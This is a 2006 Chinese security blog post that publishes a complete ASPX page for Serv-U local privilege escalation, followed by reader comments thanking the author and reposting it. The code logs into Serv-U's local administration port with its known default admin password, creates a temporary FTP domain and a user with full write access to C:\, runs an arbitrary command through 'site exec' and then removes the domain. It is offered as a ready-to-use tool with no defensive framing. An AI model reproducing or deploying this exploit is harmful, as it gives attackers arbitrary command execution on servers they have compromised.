lake2的专栏

千秋邈矣独留我，百战归来再读书

lake2ID：lake2

共217263次访问，排名300好友0人，关注者5人
懒

lake2的文章

原创 65 篇

翻译 0 篇

转载 0 篇

评论 580 篇

lake2的公告

好好学习

最近评论

cqg1220：机柜

cqg1220：<span style='color:black'>机柜</span>

cqg1220：不错，谢谢楼主！[url=http://www.bjyhjg.com/][color=#000000]机柜[/color][/url]

文章分类

收藏

相册

About

Friends

Online

Technology

World

存档

软件项目交易

订阅我的博客

ServU.aspx收藏

新一篇: 青创文章系统安全性分析 | 旧一篇: MSSQL扩展存储后门

ServU的本地提权问题已经很老了，没啥说的，只是相继出现了PHP、Perl版本，当然不能少了aspx版本^_^

以下代码Copy，保存为一个aspx文件即可。

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

    '
    ' Love, Where are you ?

    Sub BTN_Start_Click(sender As Object, e As EventArgs)
        Dim Usr As String = Text_Name.Text
        Dim pwd As String = Text_PWD.Text
        Dim Port As Int32 = Text_Port.Text
        Dim Command As String = Text_cmd.Text

        Dim LoginUser As String = "User " & Usr & vbcrlf
        Dim LoginPass As String = "Pass " & pwd & vbcrlf
        Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
        Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
        Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
                    "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
                    "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
                    "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
                    "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
                    "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
                    "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
        Dim Quit As String = "QUIT" & vbcrlf
        Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

        'Dim client As New TcpClient
        Dim tcpClient As New TcpClient()
        Try
            tcpClient.Connect("127.0.0.1", port)
        Catch eee As Exception
            response.write(eee.ToString())
            response.end
        End Try
        tcpClient.ReceiveBufferSize = 1024
        Dim networkStream As NetworkStream = tcpClient.GetStream()
        Rec(networkStream)
        Send(networkStream, LoginUser)
        Rec(networkStream)
        Send(networkStream, LoginPass)
        Rec(networkStream)
        Send(networkStream, MAINTENANCE)
        Rec(networkStream)
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, NewDomain)
        Rec(networkStream)
        Send(networkStream, NewUser)
        Rec(networkStream)
               Dim tcpClient2 As New TcpClient()
               Try
                   tcpClient2.Connect("127.0.0.1", 43859)
               Catch eee As Exception
                   response.write(eee.ToString())
                   response.end
               End Try
               tcpClient2.ReceiveBufferSize = 1024
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
               Rec(networkStream2)
               Send(networkStream2, "User lake" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "pass admin123" & vbcrlf)
               Rec(networkStream2)
               Send(networkStream2, "site exec " & Command & vbcrlf)
               Rec(networkStream2)
               tcpClient2.Close()
        Send(networkStream, DelDomain)
        Rec(networkStream)
        Send(networkStream, Quit)
        Rec(networkStream)
        tcpClient.Close()
    End Sub



    Sub Rec(o As Object)
       If o.CanRead Then
          Dim bytes(1024) As Byte
          o.Read(bytes, 0, 1024)
          Dim returndata As String = Encoding.ASCII.GetString(bytes)
          response.Write("out:" & returndata & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub

    Sub Send(o As Object,data As String)
       If o.CanWrite Then
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
          o.Write(sendBytes, 0, sendBytes.Length)
          response.write("in: " & data & "<br>")
       Else
          response.Write("What's wrong ?")
       End If
    End Sub

</script>
<html>
<head>
</head>
<body>
    <form runat="server">
        <p>
            <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
            admin by lake2</asp:Label>
        </p>
        <p>
            <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
            <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
            <br />
            <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
            <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
            <br />
            <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
            <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
            <br />
            <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
            <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
        </p>
        <p>
            <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
        </p>
        <p>
            <hr />
            
        </p>
    </form>
</body>
</html>

发表于 @ 2006年03月16日 15:30:00|评论(loading...)|编辑

新一篇: 青创文章系统安全性分析 | 旧一篇: MSSQL扩展存储后门

#Bluer 发表于2006-03-17 22:03:00 IP: 58.48.203.*: More to http://bluer.ful.cn/

#neeao 发表于2006-03-22 08:39:00 IP: 222.40.15.*: 好东西啊！支持一下！

#lake2 发表于2006-03-22 13:02:00 IP: 125.71.5.*: thanks

#小七发表于2006-03-22 23:11:00 IP: 221.14.234.*: 支持下哈。

#NetKnave 发表于2006-03-25 03:40:00 IP: 58.49.248.*: 我爱死你了....真地!!!!

#lake2 发表于2006-03-25 08:08:00 IP: 125.71.4.*: 你丫的又不是女人，没资格爱偶 :)

#sykkk 发表于2006-03-29 23:06:00 IP: 59.107.107.*: 你Y的还是丢出来了啊哈哈都写了一个多月了也该放出来大家用下了哈哈

#全金属外壳发表于2006-03-30 17:17:00 IP: 219.159.95.*: 哈哈哈..lake2兄就是好啊就是好..这下..可好哩.不知我的QQ留言您看到了没?

#我不是黑客发表于2006-04-01 18:21:00 IP: 218.28.194.*: 转走了,打个招呼

#lake2 发表于2006-04-02 08:25:00 IP: 125.71.1.*: ASP能够实现？怀疑ing，呵呵，拿出来看

#寂寞发表于2006-04-02 06:31:00 IP: 220.163.83.*: 靠!要不要asp版的，我手里自己弄了个！

#全金属外壳发表于2006-04-05 12:04:00 IP: 219.159.93.*: ASP...有个组件叫MSWinsock.winsock的不知道行不行

#NetSnow 发表于2006-04-08 09:16:00 IP: 219.148.133.*: 哦转走了。。。打个招呼先！

#.. 发表于2006-04-09 17:27:00 IP: 222.18.178.*: 今天用不来，明天就会了。
转走了。嘻嘻。。
谢谢。。。。。。

#金州发表于2006-05-10 16:00:00 IP: 222.40.232.*: 大哥，此文已转走学习
http://www.eviloctal.com/forum/htm_data/23/0605/22051.html

#飘落枫叶发表于2006-06-18 12:34:00 IP: 60.216.223.*: 哈.收下看看代码哈.

#呆菜发表于2006-08-17 16:39:00 IP: 219.149.71.*: 嘿嘿谢谢啊

#兵临城下发表于2006-08-22 21:08:00 IP: 218.106.82.*: 我用的你们的servu.asp－－－hackins后就不行了不知是什么原因，请赐教，QQ：490236109

#lake2 发表于2006-08-22 21:41:00 IP: 220.166.82.*: 没有那个义务

#冰天丽雪发表于2006-08-23 11:52:00 IP: 222.82.59.*: 嘿嘿~~lake2~
东西不错，人也不错，真不错！~

发表评论

姓名：
主页：
校验码：看不清,换一张

当前用户设置只有注册用户才能发表评论。如果你没有登录，请点击登录